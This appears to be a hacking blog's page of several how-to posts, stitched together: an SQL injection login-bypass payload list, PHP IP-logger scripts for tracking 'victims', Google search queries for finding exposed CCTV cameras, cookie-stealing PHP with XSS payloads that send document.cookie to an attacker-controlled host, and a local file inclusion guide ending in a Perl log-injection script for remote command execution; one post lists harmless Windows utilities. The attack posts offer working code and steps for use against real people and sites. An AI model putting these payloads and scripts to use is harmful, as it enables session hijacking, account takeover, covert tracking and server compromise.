SQL Injection Authentication Bypass Cheat Sheet

This list can be used by penetration testers when testing for SQL injection authentication bypass.A penetration tester can use it manually or through burp in order to automate the process.The creator of this list is Dr. Emin İslam TatlıIf (OWASP Board Member).If you have any other suggestions please feel free to leave a comment in order to improve and expand the list.

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

Thanks for visiting!

Please comment and share the post :)

Read More

Grab easily an IP with a simple PHP [100% WORKING]

Hello , 

I will show you today how to make your own working IP logger to grab any IP address you want !

Requirement :
-a PHP hosting ( a free one is perfect )
-a PHP script
-Filezilla or another FTP client

First you will need a simple and free web hosting , don't buy one , a free hosting will be perfect
this is some free web hostings :
-http://ohost.de/
-http://www.000webhost.com/
-https://www.alwaysdata.com/
-http://it.altervista.org/

there are many more ...

Create an account on that free hosting websites, choose a domain and go to the FTP connection details, you must have three informations :
-host
-username
-password

-Open filezilla ( or the FTP client of your choice) and connect to your FTP

THe PHP script :

Now you will need this code :
Code:

<?
$inF = fopen("./ip.ini", "a" ); //
fputs($inF, $REMOTE_ADDR."\n"); //
$hostname = $_SERVER["REMOTE_ADDR"];
$date_str = 'D d M Y H:i:s T(0)';
fputs($inF, date($date_str), $hostname."\n");
fputs($inF, $hostname."\n");
fclose($inF);
?>

Copy it and paste it in a text document and name the file as you want , but with PHP extension , for example : logger.php

Now just upload that file to your website

You will now have an url like this one : http://yoursite.com/logger.php

This is the URL of your IP logger , so to grab an IP , you will just need to gave that link to your victim

Once your victim has visit your URL , just go to : http://yoursite.com/ip.ini to see the date , the hour and the IP of your victim like that :

Conclusion :

This method is simple and 100 % working , if your victim click on your link , you will receive his IP in instant on your website

Read More

Hack The IP Based CCTV Cameras Using Google

Here's a list of all possible search .
Type only one search at a time into the Google search bar.

Inurl:indexframe.shtml axis
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / – AXIS”
intitle:”Live View / – AXIS 206M”
intitle:”Live View / – AXIS 206W”
intitle:”Live View / – AXIS 210″
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1″ intext:”Open Menu”
intext:”MOBOTIX M10″ intext:”Open Menu”
intext:”MOBOTIX D10″ intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1″
intitle:”sony network camera snc-m1″
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console – Web Monitor”

Example:--->
1.Type only one search at a time into the Google search bar

2.output

Don't forget to comment if you like my post.

Read More

25 Windows Hidden Tools You Seldom Use

To run any of these apps go to Start > Run and type the executable name and press Enter.
================================================

1. Character Map (charmap.exe) - Very useful for finding unusual characters.
2. Disk Cleanup (cleanmgr.exe) – The usual Disc cleanup.
3. Clipboard Viewer (clipbrd.exe) - Views contents of Windows clipboard.
4. Dr Watson (drwtsn32.exe) - Troubleshooting tool,runs when windows crashes.
5. DirectX diagnosis (dxdiag.exe) - Diagnose & test DirectX, video & sound cards.
6. Private character editor (eudcedit.exe) - Allows creation or modification of characters.
7. IExpress Wizard (iexpress.exe) - Create self-extracting / self-installing package.
8. Microsoft Synchronization Manager (mobsync.exe) - Appears to allow synchronization of files on the network for when working offline. Apparently undocumented.
9. Windows Media Player 5.1(mplay32.exe) - Retro version of Media Player, very basic.
10. ODBC Data Source Administrator (odbcad32.exe) – Database connection utility for support with external servers,create ODBC data sources,to administer remote databases or for supporting the ODBC database utility in Visual basic language.
11. Object Packager (packager.exe) - To do with packaging objects for insertion in files, appears to have comprehensive help files.
12. System Monitor (perfmon.exe) - Very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance, for budding uber-geeks only.
13. Program Manager (progman.exe) - Legacy Windows 3.x desktop shell.
14. Remote Access phone book (rasphone.exe) - Documentation is virtually non-existent.
15. Registry Editor (regedt32.exe or regedit.exe) – For making custom changes or hacking the Windows Registry.
16. Network shared folder wizard (shrpubw.exe) - Creates shared folders on network.
17. File signature verification tool (sigverif.exe) - This tool will search the operating system and identify any unsigned device drivers installed on the system. It will also verify all signed device drivers.
18. Volume Control (sndvol32.exe) - I've included this for those people that lose it from the System Notification area.
19. System Configuration Editor (sysedit.exe) - Modify System.ini & Win.ini just like in Win98!
20. Syskey (syskey.exe) - Secures XP Account database, use with care, it's virtually undocumented but it appears to encrypt all passwords, I'm not sure of the full implications.
21. Microsoft Telnet Client (telnet.exe) – Built in telnet client which can be used to connect to servers to sent emails or to hack :) This is disabled in in vista but you can re-enable it by going to Control panel –> Programs and Features –> Click "Turn Windows features on or off" on left –> Scroll down and check "Telnet Client".
22. Driver Verifier Manager (verifier.exe) - Seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented.
23. Windows for Workgroups Chat (winchat.exe) - Appears to be an old NT utility to allow chat sessions over a LAN, help files available.
24. System configuration (msconfig.exe) - Can use to control startup programs, make changes to startup of XP.
25. Group Policy Editor (gpedit.msc) - Used to manage group policies, and permissions.Its an Administrator only tool.

Read More

IP Address Hacking

This tutorial is going to show you how to hack an IP address of any remote computer.
Most of you may be curious to know this method because you want to find the IP address
of your friend's computer in order to Hack him/her.
Here is the step by step tutorial of "How to Hack IP Address”

Steps
1. Make a text file with any name. I am taking ip_ad.txt 
2. Open notepad and type in the code in PHP
OR download these script from here (click here) 
-------------------------------
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$dt = date("l dS \of F Y h:i:s A");
$file=fopen("hack_log.txt","a");
$data = $ip.' '.$dt."\n";
fwrite($file,$data);
fclose($file);
header('Location:http://pcworldtrickz.blogspot.in/'); 
?>
-------------------------------
3. Save this file as ip.php.
4. Open a new account in www.my3gb.com or www.byethost.com
    (or any free host that supports PHP).
5. Upload these two files ip.php and ip_ad.txt into the root folder
    of your hosting account using the File Manager.
6. You can rename the ip.php to any name of your choice. 
7. Set the permission to 777 on ip_ad.txt.
8. Now you are all set to find the IP address of your friend or
    any remote computer of your choice.

All you have to do is send the link of ip.php to your friend or the
person with whom you are chatting or want to hack. Once the
person clicks on the link, his IP address is recorded in the file ip_ad.txt.

For better understanding let's take up the following example. 
-----------------------
Suppose you open a new account in  byethost.com with the
sub domain as ABC, and then your IP Finder link would be

http://abc.byethost.com/ip.php  

You have to send the above link to you friend via email or while chatting and
ask him to visit that link. Once your friend clicks on the link,
his IP address will be recorded along with the Date and Time in the ip_ad.txt file.
After recording the IP address, the script will redirect the person to facebook.com.

The IP address store into the ip_ad.txt file in the following form
----------------------- 
102.54.xxx.x Thursday 07th of July 2015 05:35:20 AM
159.145.xx.xx Thursday 07th of July 2015 09:38:02  PM
13.192.44.xx Thursday 07th of July 2015 10:38:11 AM
----------------------

NOTE: You will have to replace abc with your subdomain name.

Read More

Session hijacking or cookie stealing using php and javascript

What is a cookie?
A cookie known as a web cookie or HTTP cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged every time it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits. 

What can we do after stealing cookie?
Well,as we know web sites authenticate their user's with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.
  
This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookies can later be utilized. 

PHP Code:
----------------------------- 
<?php

function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}

function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}

logData();

?> 
-----------------------------

Save the script as a cookielogger.php on your server.
(You can get any free webhosting easily such as justfree,x10hosting etc..) 

Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.

Now for the hack to work we have to inject this piece of javascript into the target's page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.

The best way is to look for user interactive sites which contain comments or forums.

Post the following code which invokes or activates the cookielogger on your host.

Code:
<script language="Java script">
document.location="http://www.yourhost.com/cookielogger.php?cookie=&quot; + document.cookie;
</script>

Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.    

Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">Click here!</a>

Clicking an image also can activate the script.For this purpose you can use the below code.

Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;"&gt;

<img src="URL OF THE IMAGE"/></a>

All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver

In the above codes please remove the space in between javascript.

Hijacking the Session:

Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin or you may find other plugins as well.

Go to the target site-->open cookie editor-->Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573

Don't forget to comment if you like my post.

Read More

How To Make Cookie Logger

What is cookie logger ?

A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

How to make your own Cookie Logger…Hope you will enjoy Reading it …

Step 1: Save the notepad file from the link below and Rename it as Fun.gif

 

Click To Download Script here

 

Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:

$filename = “logfile.txt”;

if (isset($_GET["cookie"]))

{

if (!$handle = fopen($filename, ‘a’))

{

echo “Temporary Server Error,Sorry for the inconvenience.”;

exit;

}

else

{

if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE)

{

echo “Temporary Server Error,Sorry for the inconvenience.”;

exit;

}

}

echo “Temporary Server Error,Sorry for the inconvenience.”;

fclose($handle);

exit;

}

echo “Temporary Server Error,Sorry for the inconvenience.”;

exit;

?>

Step 3: Create a new Notepad File and Save it as logfile.txt

Step 4: Upload this file to your server

cookielogger.php -> http://www.yoursite.com/cookielogger.php

logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)

fun.gif -> http://www.yoursite.com/fun.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

http://0fees.net

Step 5: Go to the victim forum and insert this code in the signature or a post :

Click to download here

Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.

Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.

Read More

Local File Inclusion (Web Hacking)

Local File Inclusion (LFI) is when you have the ability to browse through the server by means of directory transversal. One of the most common uses of LFI is to discover the /etc/passwd file. This file contains the user information of a Linux system. Hackers find sites vulnerable to LFI the same way I discussed for RFI’s. Let’s say a hacker found a vulnerable site, www.target-site.com/index.php?p=about, by means of directory transversal he would try to browse to the /etc/passwd file:

www.target-site.com/index.php?p= ../../../../../../../etc/passwd

The ../ you up one directory and the amount to use depends where in the server you are located compared the location of the /etc/passwd file.

If the hacker is able to successfully get to the /etc/passwd file he would see a list similar to the one below.

Root:x:0:0::/root:/bin/bash

bin:x:1:1:bin:/bin:/bin/false

daemon:x:2:2:daemon:/sbin:/bin/false

adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt

Each line is divided into seven parts: 

username:passwd:UserID:GroupID:full_name:directory:shell

If the password hash was shown, the hacker would be able to crack it and get access to the machine, but in our case the password isn’t shown. This means that the password is shadowed and in the /etc/shadow file which the hacker doesn’t have access to. If this was the case, the hacker would probably attempt to get access to the system another way, through log injection.

The log directories are located in different areas in different Linux distributions. Below is a list of the most common locations.

../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log

Below are the steps a hacker would take to take gain access to the system through log injection.

• First the hacker would find what operating system version the target server is running and then search where the log files are located on that OS
• Next, through LFI the hacker would navigate to that file location. If he is displayed with a bunch of logs, then he may continue.
• The hacker would then inject some PHP code into the logs by typing
  <? Passthru($_GET[‘cmd’]) ?> after = in the URL. This will cause the PHP script to be logged because there is no file by that name. What this script will do is give the hacker shell access and allow him to execute system commands.
• Now if the hacker goes back to the log file, he will see that his PHP script wasn’t parsed and instead converted to   %3C?%20passthru($_GET[cmd])%20?%3E
• When you submitted the script, the browser automatically encoded the URL. Luckily there is a pearl script that can get around this problem. Below is the pearl script, edit the variables: $site, $path, $code, and $log to the appropriate information.

#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site=”www.vulnerablesite.com”;
$path=”/”;
$code=”<? Passthru(\$_GET[cmd]) ?>”;
$log = “../../../../../../../etc/httpd/logs/error_log”;
print “Trying to inject the code”;
$socket = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$site”, PeerPort=>”80”) or die “\nConnection Failed.\n\n”;
print $socket “GET “.$path.$code.” HTTP/1.1\r\n”;
print $socket “User-Agent: “.$code.”\r\n”;
print $socket “Host: “.$site.”\r\n”;
print $socket “Connection: close\r\n\r\n”;
close($socket);
print “\nCode $code successfully injected in $log \n”;
print “\nType command to run or exit to end: “;
$cmd = <STDIN>;
while($cmd !~ “exit”) {
$socket = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$site”, PeerPort=>”80”) or die “\nConnection Failed.\n\n”;
print $socket “GET “.$path.”index.php?filename=”.$log.”&cmd=$cmd HTTP/1.1\r\n”;
print $socket “Host: “.$site.”\r\n”;
print $socket “Accept: */*\r\n”;
print $socket “Connection: close\r\n\n”;
while ($show = <$socket>)
{
print $show;
}
print “Type command to run or exit to end: “;

$cmd = <STDIN>;
}

Once the hacker runs this script and it goes successfully, he will be able to run any command on the server. From here he can run any local exploits to gain root, or just browse the server files.

Read More